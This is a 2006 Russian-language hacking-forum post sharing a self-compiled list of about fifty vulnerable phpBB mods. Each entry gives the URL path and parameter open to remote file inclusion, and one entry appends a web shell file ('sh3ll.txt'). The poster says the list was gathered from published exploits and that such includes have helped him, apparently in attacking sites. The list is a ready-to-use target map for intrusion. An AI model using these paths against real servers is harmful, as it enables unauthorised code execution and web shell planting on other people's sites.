Тема: Прости господа, но phpBB 2.0.21 что универсальна?!
Показать сообщение отдельно

  #17  
Старый 21.11.2006, 23:12
Digimortal
Banned
Регистрация: 22.08.2006
Сообщений: 608
Провел на форуме:
6144796

Репутация: 1095


По умолчанию
насчет уязвимостей хаков, модификаций пхпбб.. там чаще всего можно повстречать уязвимости типа удаленный инклуд, есть достаточно много эдвайзори и сплойтов по этой теме.. я, по сводкам багтрака и, просмотрев в свое время кучу сплоитов для модов пхпбб на милворме, составил этакий файлик уязвимых сценариев и пополняю его время от времени:
Код:
TopList Hack for PHPBB <= 1.3.8		/toplist.php?f=toplist_top10&phpbb_root_path=
Advanced GuestBook			/admin/addentry.php?phpbb_root_path=
Knowledge Base Mod			/includes/kb_constants.php?module_root_path=
phpBB auction mod			/auction/auction_common.php?phpbb_root_path=
phpRaid <= 3.0.b3			/[phpraidpath]/auth/auth.php?phpbb_root_path=									/[phpraidpath]/auth/auth_phpbb/phpbb_root_path=
					/[phpraidpath]/auth/auth.php?smf_root_path=
					/[phpraidpath]/auth/auth_SMF/smf_root_path=
PafileDB				/[pdbpath]/includes/pafiledb_constants.php?module_root_path=
Foing <= 0.7.0				/index.php?phpbb_root_path=
					/song.php?phpbb_root_path=
					/faq.php?phpbb_root_path=
					/list.php?phpbb_root_path=
					/gen_m3u.php?phpbb_root_path=
					/playlist.php?phpbb_root_path=
Activity MOD Plus			/language/lang_english/lang_activity.php?phpbb_root_path=
Blend Portal <= 1.2.0			/blend_data/blend_common.php?phpbb_root_path=
Minerva <= 2.0.8a			/stat_modules/users_age/module.php?phpbb_root_path=
Minerva <= v238				/admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=
FlashBB <= 1.1.5			/phpbb/getmsg.php?phpbb_root_path=
HoRCMS <= 1.3.1				/includes/functions_cms.php?phpbb_root_path=
mail2forum <= 1.2			/m2f/m2f_phpbb204.php?m2f_root_path=
					/m2f/m2f_forum.php?m2f_root_path=
					/m2f/m2f_mailinglist.php?m2f_root_path=
					/m2f/m2f_cron.php?m2f_root_path=
WoW Roster				/[roster_path]/lib/phpbb.php?subdir=
Integramod Portal			/includes/functions_mod_user.php?phpbb_root_path=
					/includes/functions.php?phpbb_root_path=
Shadow Premod <= 2.7.1			/includes/functions_portal.php?phpbb_root_path=				
phpBB XS <= 0.58			/includes/functions_kb.php?phpbb_root_path=
					/includes/bbcb_mg.php?phpbb_root_path=
					/includes/functions.php?phpbb_root_path=
pnphpbb					/includes/functions_admin.php?phpbb_root_path=
Admin Topic Action Logging		/admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=
phpBB Static Topics <= 1.0		/includes/functions_static_topics.php?phpbb_root_path=
Security Suite IP Logger		/includes/logger_engine.php?phpbb_root_path=
Dimension of phpBB			/includes/themen_portal_mitte.php?phpbb_root_path=
					/includes/logger_engine.php?phpbb_root_path=
					/includes/functions.php?phpbb_root_path=
phpBB User Viewed Posts Tracker		/includes/functions_user_viewed_posts.php?phpbb_root_path=
phpBB RANDOm USER REGISTRATION NUMBER	/includes/functions_num_image.php?phpbb_root_path=
phpBB insert user <= 0.1.2		/includes/functions_mod_user.php?phpbb_root_path=
phpBB Import Tools Mod <= 0.1.4		/includes/functions_mod_user.php?phpbb_root_path=
phpBB Ajax Shoutbox <= 0.0.5		/shoutbox.php?phpbb_root_path=
SpamBlockerMOD <= 1.0.2			/root/includes/antispam.php?phpbb_root_path=
phpBB PlusXL 2.x <= biuld 272		/mods/iai/includes/constants.php?phpbb_root_path=
AMAZONIA MOD				/zufallscodepart.php?phpbb_root_path=
news defilante horizontale <= 4.1.1	/franзais/root/includes/functions_newshr.php?phpbb_root_path=
phpBB lat2cyr <= 1.0.1			/lat2cyr.php?phpbb_root_path=
SpamOborona PHPBB Plugin		/admin/admin_spam.php?phpbb_root_path=
RPG Events 1.0.0			/functions_rpg_events.php?phpbb_root_path=
phpBB archive for search engines	/includes/archive/archive_topic.php?phpbb_root_path=
PhpBB Prillian French			/language/lang_french/lang_prillian_faq.php?phpbb_root_path=
phpBB ACP User Registration Mod 1.00	/includes/functions_mod_user.php?phpbb_root_path=
phpBB Security <= 1.0.1			/phpbb_security.php?phpbb_root_path=
phpBBFM version 206-3-3			/language/lang_english/lang_prillian_faq.php?phpbb_root_path=
Fully Modded phpBB 2			/faq.php?foing_root_path=sh3ll.txt?
					/index.php?foing_root_path=
					/list.php?foing_root_path=
					/login.php?foing_root_path=
					/playlist.php?foing_root_path=
					/song.php?foing_root_path=
					/gen_m3u.php?foing_root_path=
					/view_artist.php?foing_root_path=
					/view_song.php?foing_root_path=
					/login.php?foing_root_path=
					/playlist.php?foing_root_path=
					/song.php?foing_root_path=
					/flash/set_na.php?foing_root_path=
					/flash/initialise.php?foing_root_path=
					/flash/get_song.php?foing_root_path=
					/includes/common.php?foing_root_path=
					/admin/nav.php?foing_root_path=
					/admin/main.php?foing_root_path=
					/admin/list_artists.php?foing_root_path=
					/admin/index.php?foing_root_path=
					/admin/genres.php?foing_root_path=
					/admin/edit_artist.php?foing_root_path=
					/admin/edit_album.php?foing_root_path=
					/admin/config.php?foing_root_path=
					/admin/admin_status.php?foing_root_path=
Spider Friendly <= 1.3.10		/admin/modules_data.php?phpbb_root_path=
не знаю, мож кому пригодится, мне такие инклуды всего пару раз помогли..